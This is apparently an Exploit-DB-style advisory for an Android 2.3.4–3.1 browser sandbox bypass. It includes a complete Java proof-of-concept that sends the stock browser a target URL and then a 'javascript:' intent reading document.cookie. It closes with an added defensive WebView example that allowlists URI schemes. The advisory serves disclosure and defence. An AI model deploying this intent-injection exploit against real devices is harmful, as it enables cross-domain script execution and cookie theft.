Vendor: Android
By: Unknown
CVSS: 7.5 (HIGH)
Title: Bypass of Browser Sandbox
CWE: 94
Product Name: Android
Affected Version From: Android 2.3.4
Affected Version To: Android 3.1
Patch Exists: YES
Related CVE: CVE-2011-1823
CPE: cpe:/o:google:android:2.3.4 cpe:/o:google:android:3.1
Platforms Tested: Android
2011

Bypass of Browser Sandbox in Open Handset Alliance Android

The Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox. Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.

Mitigation:

Apply the latest security patches and updates from the Android vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48954/info

Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.

Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.

Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected. 

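import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class CasExploit extends Activity
{
   // Explicit target component: the stock browser activity.
   static final String mPackage = "com.android.browser";
   static final String mClass = "BrowserActivity";
   static final String mUrl = "http://target.domain/";
   static final String mJavascript = "alert(document.cookie)";
   // Delay between the two intents, in milliseconds.
   static final int mSleep = 15000;

   @Override
   public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      // First intent: the browser loads the target page.
      startBrowserActivity(mUrl);
      try {
         Thread.sleep(mSleep);
      }
      catch (InterruptedException e) {}
      // Second intent: a javascript: URI sent to the same browser activity.
      startBrowserActivity("javascript:" + mJavascript);
   }

   // Sends an explicit VIEW intent carrying the given URL to the browser.
   private void startBrowserActivity(String url) {
      Intent res = new Intent("android.intent.action.VIEW");
      res.setComponent(new ComponentName(mPackage, mPackage + "." + mClass));
      res.setData(Uri.parse(url));
      startActivity(res);
   }
}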
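
The defensive counterpart to the proof of concept above, as an added example that is not part of the original advisory and is not the Android Browser's own code or its patch: an exported activity that hosts a WebView and only loads caller-supplied URIs whose scheme is on an allowlist, so a later intent cannot run script in a page that is already loaded. The class name SafeViewActivity and the helper isLoadable are hypothetical.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.WebView;

// Hypothetical activity (the name is an assumption) that accepts VIEW
// intents from other apps and shows the URL in a WebView.
public class SafeViewActivity extends Activity {
    private static final String TAG = "SafeViewActivity";
    private WebView mWebView;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        setContentView(mWebView);
        handleIntent(getIntent());
    }

    // With singleTop/singleTask launch modes a second intent is delivered
    // here while an earlier page is still loaded in mWebView.
    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        handleIntent(intent);
    }

    private void handleIntent(Intent intent) {
        Uri uri = (intent == null) ? null : intent.getData();
        if (!isLoadable(uri)) {
            Log.w(TAG, "Rejected external URI: " + uri);
            return; // leave the current page untouched
        }
        mWebView.loadUrl(uri.toString());
    }

    // Allowlist, not a blocklist: javascript:, data:, file: and content:
    // are rejected because only http and https are accepted.
    static boolean isLoadable(Uri uri) {
        if (uri == null || uri.getScheme() == null) return false;
        // Uri.getScheme() preserves case, so compare case-insensitively.
        String scheme = uri.getScheme();
        boolean web = "http".equalsIgnoreCase(scheme)
                || "https".equalsIgnoreCase(scheme);
        return web && uri.getHost() != null;
    }
}
```

The same check belongs on every entry point that passes a caller-supplied URI to loadUrl().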